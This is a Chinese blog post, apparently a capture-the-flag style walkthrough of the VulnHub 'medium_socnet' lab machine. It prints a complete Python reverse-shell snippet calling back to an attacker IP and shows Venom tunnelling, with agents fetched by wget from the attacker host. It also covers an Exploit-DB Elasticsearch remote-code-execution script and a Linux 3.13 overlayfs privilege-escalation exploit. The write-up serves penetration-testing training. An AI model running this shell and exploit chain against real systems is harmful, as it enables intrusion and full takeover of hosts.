medium-socnet靶机打靶过程及思路

已于 2022-07-22 17:59:59 修改
阅读量3.9k 收藏
点赞数 1
文章标签: 网络安全
于 2022-04-02 20:32:34 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_52610024/article/details/123928379
版权

1.无法扫到ip地址
解决方法:设置全局nat

2.无法反弹shell
解决方法:换成/bin/sh
或者直接用python反弹shell代码:
import socket,subprocess,os;
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);
s.connect((“192.168.168.13”,4444));
os.dup2(s.fileno(),0);
os.dup2(s.fileno(),1);
os.dup2(s.fileno(),2);
p=subprocess.call([“/bin/sh”,“-i”]);

3.判断是否为docker容器:
①查看根下文件:/.dockerenv
②查看proc目录下文件:cat /proc/1/cgroup

4.内网穿透代理
①首先使用内网工具Venom :在内网和kali之间建立一条隧道,基于隧道生成一个代理,
基于代理让工具扫描内网

②先把隧道的客户端程序传输拷贝到目标系统上,然后再通过在kali上的服务端程序在两
者间建立一条隧道

1.kali 本机上运行admin_linux_x64 侦听端口9999 等待目标建立连接
./admin_linux_x64 -lport 9999

2.开启kali本机的http服务

python3 -m http.server 80

3.在靶机上用wget来访问kali上的程序下载agent_liunx_x64

wget http://10.0.2.4(kali本机地址)/agent_liunx_x64

4.赋予下载下来的文件权限

chmod+x agent_liunx_x64

5.用靶机上面下载文件访问kali本机

./a -rhost 10.0.2.4 -rport 9999

6.本机上在venom下show命令查看节点然后连接节点

show

goto1

7.在kali上的socks上启动侦听端口

socks 1080

③为了让kali上面的所有工具都可以用来扫描,用proxychains挂载在socks代理上

1.sudo vi /etc/proxychains4.conf 将代理类型改为socks5文件末尾的端口改为1080

④开始扫描目标地址上存活的其他主机

1.proxychains nmap -sT -Pn 172.17.0.1 URI 端口扫描中最稳定的,利用的是TCP三次握手

2.查看目标端口的服务信息proxychains nmap -p22,5000 -sT -sV -Pn 172.17.0.1

3.火狐浏览器内设置socks代理 127.0.0.1 端口1080

4.kali浏览器访问靶机内网地址发现留言板内容一致,说明该主机是镜像的宿主机,面向容器
内网的IP地址,172,17.0.1即为要攻击的靶机

5.对172.17.0.2 发现只开放9200端口 意识到Elasticsearch开放在9200端口上

proxychains nmap -sT -Pn 172.17.0.2

proxychains nmap -p9200 -sV-sT -Pn 172.17.0.1

⑥用searchsploit搜索Elasticsearch然后尝试利用远程代码执行漏洞攻击

1.cp /usr/share/exploitdb/exploits/linux/remote/36337.py . ------复制代码到根目录下

2.使用脚本开始攻击 ------ proxychains python2 36337.py 172.17.0.2

出现id敲击无法获取到root权限问题,解决方法:插入
proxychains curl -XPOST ‘172.17.0.2:9200/twittter/user/yren’ -d ‘{“name”:“Wu”}’
原因:因为Elasticsearch中需要先有数据才能被攻击

3.id发现为root权限,ls查看passwords挨个登录发现john的密码hack1337可以登录

⑦ssh登录john ----ssh john@10.0.2.5 准备进行提权操作

1.uname -a 发现版本为3.13 然后searchsploit linux3.13 拷贝脚本37292.c到根目录

cp /usr/share/exploitdb/exploits/linux/local/37292.c .

2.目标靶机上没有gcc 所以在本机编译后再传过去 修改掉需要编译的部分

从fprintf(stderr)到write (fd)

3.开始编译 gcc -o exp 37392.c – 把37392.c这个文件改变为exp

4.发现存在locate ofs-lib.so 然后拷贝过来

cp /usr/share/metasploit-framework/data/exploits/CVE-2015-1328/ofs-lib.so .

5.继续开启http服务 靶机上下载下来exp文件

python3 -m http.server 80

wget http://10.0.2.4/Desktop/‘Venom v1.1.0’/exp

wget http://10.0.2.4/Desktop/‘Venom v1.1.0’/ofs-lib.so

6.将所有文件存放到/tmp目录下,因为只有/tmp目录下有可执行和阅读的权限

cp * /tmp/

cd /tmp/

chmod +x ./exp

./exp运行

7.输入id发现已经得到root权限,打靶完毕

zsszjybb
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
exploit-db图文教程
xiongIT的博客
12-04 3763
ExploitDB 是一个面向全世界黑客的漏洞提交平台,该平台会公布最新漏洞的相关情况,这些可以帮助企业改善公司的安全状况,同时也以帮助安全研究者和渗透测试工程师更好的进行安全测试工作。Exploit-DB 提供一整套庞大的归档体系,其中涵盖了各类公开的攻击事件、漏洞报告、安全文章以及技术教程等资源。
medium_socnet
果粒程
11-21 839
vulnhub-medium_socnet靶机打靶过程
永恒之蓝漏洞复现(二)对目标靶机建立用户,并且开启靶机的远程桌面,使用该用户进行连接
wty923的博客
01-12 1829
对目标靶机建立用户,并且开启靶机的远程桌面,使用该用户进行连接
Exploit-DB与相关本地工具的综合运用
最新发布
Kali与编程
04-10 352
例如,在进行web应用渗透时,可能先用Nmap扫描目标网络服务,再结合Burp Suite抓包分析请求响应,找出潜在漏洞点,最后在Exploit-DB中寻找适用的exploit并实施攻击。Exploit-DB作为丰富的漏洞利用资源库,与本地安全工具的紧密结合能够极大提高安全研究和渗透测试的工作效率。以Metasploit Framework为例,这是一个集成开发环境,集成了众多Exploit-DB中的exploit,并提供了图形化和命令行界面,方便用户执行和管理渗透测试任务。二、Exploit-DB简介。
Venom工具的使用
weixin_44508748的博客
05-23 4210
前提:已经拿到某服务器shell,可以上传文件且具有执行权限; 项目地址(编译后):https://github.com/Dliv3/Venom/releases 一、进入内网 1.上传admin_linux_x64到vps端,运行并监听本地11111端口: chmod 777 admin_linux_x64 ./ admin_linux_x64 -lport 11111 2.利用已经拿到的的shell上传agent_linux_x64文件到目标服务器,并执行 chmod 777 agent_linu
socnet-backend
03-19
后端网络
SocNet:OOPT项目3
07-21
社交网络 OOPT项目3
SocNetV-3.0.4-7751bace-windows-installer.zip
01-18
Social Network Visualizer (SocNetV) is a cross-platform, user-friendly free software application for social network analysis and visualization. With SocNetV you can: Draw social networks with a few ...
Group17:社交媒体应用
05-20
第17组-SocNet 带有SocNet临时名称和徽标的Social Networking App 分工 David:主页Fernando:注册/登录 技术领域 我们的团队在Bootstrap和一点CSS中使用了HTML 注册说明 注册页面包含一个主要的div元素和一个表单...
40个神奇国外开放源码WordPress插件设计
08-15
仅仅是调用函数 socnet_display_links(合 post_id)在你的模板或删除 post_id 美元如果在循环。 hashbuddy 插件是一个免费的 WordPress 插件为实施和 BuddyPress。它将解析为散列符号链接到 Twitter 用户更新的...
walle v1.1.0使用的vendor包
09-09
walle v1.1.0使用的vendor包 不用花很长时间下载,直接复制粘贴
利用 exploit-db 交叉编译 shellcode
YouTheFreedom的博客
09-22 534
shellcode 通用编写方法 获得shellcode一般有如下五种办法: pwntools: asm(shellcraft.arm.linux.sh(),arch=’arm’) msfvenom: msfvenom -p linux/armle/shell/reverse_tcp LHOST=192.168.1.100 LPORT=6666 -f py -o msf.py shell-storm: http://shell-storm.org/shellcode/ exploit-db: https
SearchSploit漏洞查找工具使用指南
大方子
10-04 7524
什么是SearchSploit: “searchsploit”是一个用于Exploit-DB的命令行搜索工具,它还允许你随身带一份Exploit-DB的副本。 SearchSploit为您提供了在本地保存的存储库中执行详细的离线搜索的能力。这种能力特别适用于在没有互联网接入的情况下对网络进行安全评估。许多漏洞都包含了二进制文件的链接,这些文件不包含在标准存储库中,但可以在我们的Exploit-...
内网入口——代理搭建&端口转发
热门推荐
Captain_RB的博客
12-19 1万+
在内网渗透过程中经常会遇到搭建代理和端口转发的情况,本文记录一些常用工具的使用方法和典型应用场景,便于查阅。
【VulnHub靶场】——BOREDHACKERBLOG: SOCIAL NETWORK
Demo不是emo的博客
10-29 7107
二十四次系统性打靶第一次,每次打靶后都会分享靶场攻略和总结的知识点,如果对渗透测试和打靶比较感兴趣的小伙伴们也可以跟着我一起训练哦
在本地打开远程Linux服务器上的Jupyter
xsstef的博客
05-13 1075
jupyter notebook --no-browserssh -p 2018 -L 8157:localhost:8888 tju@651.m2i.ac.cnhttp://localhost:8157
medium_socnet靶场
wcl20010的博客
05-02 2715
1.主机发现 arp-scan -l nmap -p 1-65535 -A 192.168.128.140 发现的22 5000端口 通过服务级别的探测 nmap -p22,5000 -sV 192.168.128.140 2.漏洞发现 发现一个信息:说明服务使用python的脚本编写 Werkzeug httpd 0.14.1 (Python 2.7.15) 知道一个网页,发现不到信息尝试进行目录扫描,使用工具dirb或者dirsearch dirsearch -u http://
使用Shell编写在exploit-db中下载漏洞利用脚本程序
m0_47555956的博客
09-20 1500
使用Shell编写在exploit-db中下载漏洞利用脚本程序
靶机渗透练习31-Funbox10-Under Construction
hirak0的博客
04-18 994
靶机描述 靶机地址:https://www.vulnhub.com/entry/funbox-under-construction,715/ Description As always, it’s a very easy box for beginners. This works better on VitualBox rather than VMware 一、搭建靶机环境 攻击机Kali: IP地址:192.168.9.7 靶机: IP地址:192.168.9.49 注:靶机与Kali的IP地

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值